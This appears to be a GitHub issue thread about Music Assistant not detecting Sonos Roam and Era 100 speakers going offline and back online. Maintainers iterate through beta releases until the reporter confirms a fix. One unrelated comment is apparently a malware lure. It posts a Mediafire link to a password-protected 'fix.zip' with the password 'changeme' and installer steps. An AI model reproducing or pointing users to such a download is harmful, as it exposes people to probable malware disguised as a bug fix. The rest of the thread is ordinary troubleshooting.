### ISSUE TITLE
Sonos speaker (battery powered) beeing offline is not detected.

### ISSUE THREAD

**Issue by HA-TB303** [music-assistant/hass-music-assistant#2819]
### What version of Music Assistant has the issue?

2.3.0b6

### Have you tried everything in the Troubleshooting FAQ and reviewed the Open and Closed Issues and Discussions to resolve this yourself?

- [X] Yes

### The problem

As a follow-up to issue https://github.com/music-assistant/hass-music-assistant/issues/2257 a battery powered Sonos speaker being offline is not detected, even after a longer time.

Home Assistant integration noticed the speaker being unavailable right away.

### How to reproduce

Switch off the sonos battery powered speaker, or cut power to a battery powered one and then observe it here:
![CleanShot 2024-08-26 at 17 02 45](https://github.com/user-attachments/assets/f613ccfe-b031-49d1-9d1e-b0fd2a41b13b)

"Kantoor" (sonos era100, which is detached from power)
![CleanShot 2024-08-26 at 17 06 11](https://github.com/user-attachments/assets/bb89d8b6-238a-49c5-9207-3f373a8d485f)
Logeerkamer (Sonos Roam) switched off:
![CleanShot 2024-08-26 at 17 07 22](https://github.com/user-attachments/assets/962f8877-edf1-4ce9-a044-aa38ae811748)

Both of which are not marked offline by Music Assistant.

### Music Providers

N/A

### Player Providers

Sonos

### What version of Home Assistant Core are your running

2024.8.3

### What type of installation are you running?

Home Assistant OS

### On what type of hardware are you running?

Generic x86-64 (e.g. Intel NUC)

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marcelveldt** [comment]
Can you recheck this in 2.3.0 beta 7 please ?

**Comment by HA-TB303** [comment]
The speaker beging offline is now detected properly. It also plays back in the group just fine.

But now the speaker being **online** is not detected after the first time. I have tried switching it on and off multiple times. From on to off is instant, but from off to on does not update in the UI. The speaker does play just fine. Refreshing the UI and waiting a longer time does not help.

Please do not make me create another issue, as this issues has been filed before and that one was closed due to this issue ;)

**Comment by marcelveldt** [comment]
Thanks for testing. I'll add a few more patches around re-discovery of offline speakers that come back online. Its kind of tricky as that results in a stormflood of events. Please test the next beta again, thanks !

**Comment by HA-TB303** [comment]
Will do.

**Comment by HA-TB303** [comment]
I have just retested version: 2.3.0b8, but I’m afraid it’s jot yet working as expected.

When turning the sonos roam off and on this first time it works, but from then on, it will no longer detect the speaker being switched on.

**Comment by HA-TB303** [comment]
Same for the beta 16.

**Comment by marcelveldt** [comment]
I didnt have time to look at this yet - wait for me to reply here when I addressed it. It wont resolve itself on its own ;-)

**Comment by HA-TB303** [comment]
check

**Comment by marcelveldt** [comment]
This one is fixed in 2.3.0b33

**Comment by OzGav** [comment]
@HA-TB303 please confirm

**Comment by HA-TB303** [comment]
Sad to say this bug is still unresolved.

1. I turn "logeerkamer" (Sonos Roam) on. It registers in music assistant.
2. I play music on "logeerkamer". Works.
3. I turn "logeerkamer off". It takes a while, but this is registered +/- 1 minute after tuning it off.
4. I turn "logeerkamer" (Sonos Roam) back on. This no longer registers in music assistant.

So it still only works the first time. Home Assistant and the S2 app do correctly register the speaker being turned on/off.

**Comment by marcelveldt** [comment]
How fast did you turn it back on ?

HA is doing background polling (which is bad imo) - we rely purely on mdns announcements, so if those fail to be delivered, that would explain why it doesn't work for you. I have tested this like 50 times, works every single time.
What I can do is do a background poll only for the first X period of the speaker being unavailable as fallback but its strange that that would be needed in the first place.

**Comment by marcelveldt** [comment]
I've added a small reconnect additional retry poll logic.
Available in 2.3.0 rc1

**Comment by OzGav** [comment]
2.3.0rc1 is released. Please test again

**Comment by HA-TB303** [comment]
I'v tested with short intervals (a few second to a minute) and longer intervals and it seems to work flawlessly now. 👍
